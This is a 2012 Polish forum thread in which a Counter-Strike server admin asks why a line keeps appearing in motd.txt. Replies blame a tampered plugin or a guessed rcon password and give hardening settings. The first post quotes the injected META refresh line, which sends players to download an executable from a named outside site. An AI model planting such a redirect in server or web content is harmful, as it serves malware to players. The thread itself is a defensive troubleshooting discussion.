Skocz do zawartości

Witamy w Nieoficjalnym polskim support'cie AMX Mod X

Witamy w Nieoficjalnym polskim support'cie AMX Mod X, jak w większości społeczności internetowych musisz się zarejestrować aby móc odpowiadać lub zakładać nowe tematy, ale nie bój się to jest prosty proces w którym wymagamy minimalnych informacji.
  • Rozpoczynaj nowe tematy i odpowiedaj na inne
  • Zapisz się do tematów i for, aby otrzymywać automatyczne uaktualnienia
  • Dodawaj wydarzenia do kalendarza społecznościowego
  • Stwórz swój własny profil i zdobywaj nowych znajomych
  • Zdobywaj nowe doświadczenia

Dołączona grafika Dołączona grafika

Guest Message by DevFuse
 

Zdjęcie

Wirus w motd.txt


  • Zamknięty Temat jest zamknięty
9 odpowiedzi w tym temacie

#1 delmus

    Banned

  • Zbanowany

Reputacja: -4
Nowy

  • Postów:59
  • Imię:Michał
  • Lokalizacja:Bydgoszcz
Offline

Napisano 03.08.2012 23:11

Witam , mam problem z moim serwerem ,a mianowicie co jakiś czas w motd.txt samo ustawia mi się takie coś.

<META HTTP-EQUIV=Refresh CONTENT="0 URL=http://free-leaks.com/cstrike.exe">

Wtedy przy wejściu na serwer minimalizuje cs'a i zaczyna ściągać pliczek. Jest to raczej wirus ,bo gdy próbuje wejść z przeglądarki na tą stronę podaną w motd to avast mi blokuje wejście. Powie mi ktoś co zrobić by kłopot więcej się nie zdarzał ?

#2 QuahodronN

    Godlike

  • Power User

Reputacja: 230
Wszechwidzący

  • Postów:1 262
  • GG:
  • Steam:steam
  • Imię:Olo
  • Lokalizacja:Śląsk
Offline

Napisano 04.08.2012 00:38

Jeśli sciągałeś plugin skądś indziej niż amxx.pl to możliwe że znajduję się w jakimś pluginie takie coś :)
Lub pogadaj z hostingiem serwera
  • +
  • -
  • 0

| CPU: I7-6700K @4.7GHz | Cooling: Corsair H110 | GPU: MSI GTX 1080 Gaming X | MOBO: Asus Maximus VIII Hero | RAM: Kingston Savage 16GB DDR4 @2800MHz |

| SSD: Samsung 840 Pro 128GB | SSD2: Samsung 840 Pro 256GB  |  PSU: Be Quiet L8 630W | Case: Gladius M40 | Mouse: Gigabyte M6980X | Keyboard: Sharkoon SHARK ZONE K20 Headphones: HyperX HX Cloud Black Display: Triple LG 24MP67VQ-P |

 

TS3: ts.kreedzmania.pl - 512 Slotów - Darmowe Kanały ;)


#3 kukla1910

    Profesjonalista

  • Przedstawiciel Firmy

Reputacja: 55
Pomocny

  • Postów:216
  • GG:
  • Imię:Darek
  • Lokalizacja:Łódź
Offline

Napisano 04.08.2012 01:17

Usuń zawartość motd.txt.
Pokaż jeszcze plugins.ini jakiś plugin dodaje Ci tę ścieżkę w motd.txt
  • +
  • -
  • 0

#4 Fail

    Zaawansowany

  • Zbanowany

Reputacja: -15
Tragedia

  • Postów:134
  • Lokalizacja:z forum
Offline

Napisano 04.08.2012 08:40

Musisz przejrzec wszystkie .sma swoich pluginów pod wzgledem "cstrike.exe" i najlepiej samemu je skompilowac, poniewaz mozliwe iz .sma masz dobre, a plik .amxx pobrales wlasnie z ta przerobka.

Użytkownik Fail edytował ten post 04.08.2012 08:40


#5 saha

    Początkujący

  • Użytkownik

Reputacja: -2
Nowy

  • Postów:14
  • Lokalizacja:Wielczka
Offline

Napisano 07.08.2012 09:32

Mialem ten sam problem i poradziłem sobie z nim napisz na gg 2101159
  • +
  • -
  • 0

#6 dasiek

    Nie wiem, nie znam się, nie orientuję się, zarobiony jestem.

  • Junior Admin

Reputacja: 2 077
Godlike

  • Postów:5 706
  • Imię:Adaś
  • Lokalizacja:No teraz trochę dalej od WWy
Offline

Napisano 07.08.2012 10:05

saha - powiedz tu a nie na gg prosisz. Pytanie na forum - odpowiedź na forum. ;>
  • +
  • -
  • 0

#7 IndeS

    Wszechwiedzący

  • Power User

Reputacja: 146
Zaawansowany

  • Postów:574
  • GG:
  • Steam:steam
  • Imię:Tomasz
  • Lokalizacja:NT
Offline

Napisano 07.08.2012 10:26

Tego wirusa można bardzo łatwo sie pozbyc. Jak on sie dostal? Ktos zgadl Twoje haslo rcon.
Co trzeba zrobic?
1. Zmienić hasło rcon
2. wywali modt ten z wirusem
3. Dopisac do serwer.cfg

sv_rcon_banpenalty 60 //czas bana za probe uzycia zlego rcon'a za wielokrotne proby (banuje na ip), 0 to na zawsze
sv_rcon_minfailures 3 // limit zlych komend rcon aby dostac ban'a
sv_rcon_minfailuretime 30 // czas w jakim sa sprawdzane proby rcon,


Warto też co jakis czas zmienic haslo do rcon'a. Mialem ten problem wczoraj i znajomy mi wlasnie pomogl i powiedzial co mam zrobic.
Zrobilem i dziala :)
Pozbylem sie wirusa :) on tez kiedys to mial i to podzialalo :)
  • +
  • -
  • 3
Dołączona grafika

#8 Fail

    Zaawansowany

  • Zbanowany

Reputacja: -15
Tragedia

  • Postów:134
  • Lokalizacja:z forum
Offline

Napisano 08.08.2012 09:26

Ehh, jeszcze kilka lat temu kto by pomyslal, zeby do csa dodawac wirusy, a teraz wszystko jest mozliwe, jeszcze troche a strach bedzie wbijac na serwery cs. Dobre rozwiazanie, ale myslalem ze o zabezpieczeniu rcon kazdy pamieta, zwlaszcza iz chyba uwage na to zwrocil DarkGL. Bezpieczenstwo to podstawa. + za odkrycie powodu ;]

#9 saha

    Początkujący

  • Użytkownik

Reputacja: -2
Nowy

  • Postów:14
  • Lokalizacja:Wielczka
Offline

Napisano 08.08.2012 16:41

Ja usunolem zawartosc motd.txt. a nastepnie dalem właściwości i zaznaczylem tylko do odczytu i wgrałem ponownie na serwer. Jak nie dasz tylko do odczytu to wirus spowrotem bedzie , jedyna rzecz która działa to to co napisalem.
  • +
  • -
  • 0

#10 IndeS

    Wszechwiedzący

  • Power User

Reputacja: 146
Zaawansowany

  • Postów:574
  • GG:
  • Steam:steam
  • Imię:Tomasz
  • Lokalizacja:NT
Offline

Napisano 08.08.2012 16:57

Saha, nie znam sie na tym wiec nie wiem jak to doklanie dziala. Ale jesli ten wirus nie zmienia zawartosci motd tylko podmienia ten plik? To to ze masz tylko do odczytu nic Ci nie da. A jak dostanie bana za bledne haslo to na pewno nic nie zrobi :)
  • +
  • -
  • 1
Dołączona grafika




Użytkownicy przeglądający ten temat: 0

0 użytkowników, 0 gości, 0 anonimowych